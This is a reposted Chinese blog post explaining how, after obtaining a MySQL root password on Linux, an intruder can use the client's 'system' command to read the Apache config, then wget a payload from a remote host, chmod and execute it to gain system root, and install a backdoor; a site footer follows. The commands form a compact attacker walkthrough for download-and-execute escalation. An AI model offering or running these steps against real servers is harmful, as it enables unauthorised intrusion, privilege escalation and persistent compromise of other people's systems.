mysql5.x for linux下面有一個函數(shù)，可以幫助我們干很多事情，這個函數(shù)4。x下面貌似沒，原來一直沒發(fā)現(xiàn)，也沒去查函數(shù)手冊，就我自己的經(jīng)驗來寫點東西。4,x的明天再看看函數(shù)手冊，再裝一個實驗一下。

mysql 5.x里面引入了一個system函數(shù)，這個函數(shù)可以執(zhí)行系統(tǒng)命令，當(dāng)mysql以root登陸的時候，就可以利用這個函數(shù)執(zhí)行命令，當(dāng)然是在權(quán)限許可的范圍內(nèi)。

一般我們按照常規(guī)思路，搞到mysql的root密碼之后，我們都會連接上去，創(chuàng)建一個表，然后outfile，搞到一個webshell ,然后提權(quán)如此這般。今天我們換一種方式。

按照上面的方法，我們需要知道web的絕對路徑，當(dāng)然這個很不好找，有些有sqlinjection的，可能報錯會顯示出來，有的就不一定了。但是按照我的的方法，沒有必要再去找web路徑了，直接執(zhí)行

mysql>system vi /etc/httpd/conf/httpd.conf;

直接這樣就可以找到web的路徑，當(dāng)然，我們的目的并不是找web路徑，放webshell進去。我們是要來做其他的事情，比如，下載exp執(zhí)行，搞到root權(quán)限，然后裝后門蝦米的

mysql>system wget http://xxxx.xxx.com/xxxx ;

mysql>system chmod +x xxxx;

mysql>system ./xxxx;

這樣mysql的root此時就成為system的root了，剩下的事情，如果開了ssh,就ssh上去，輸入mysql的用戶密碼，ok,搞定。

或者，直接提權(quán)之后，下載后門安裝，這個就留給大家去研究了。

轉(zhuǎn)載于:https://www.cnblogs.com/allyesno/archive/2007/09/28/908951.html

總結(jié)

以上是生活随笔為你收集整理的Linux下mysql 5.x得到root密码后的另外一种利用方式的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。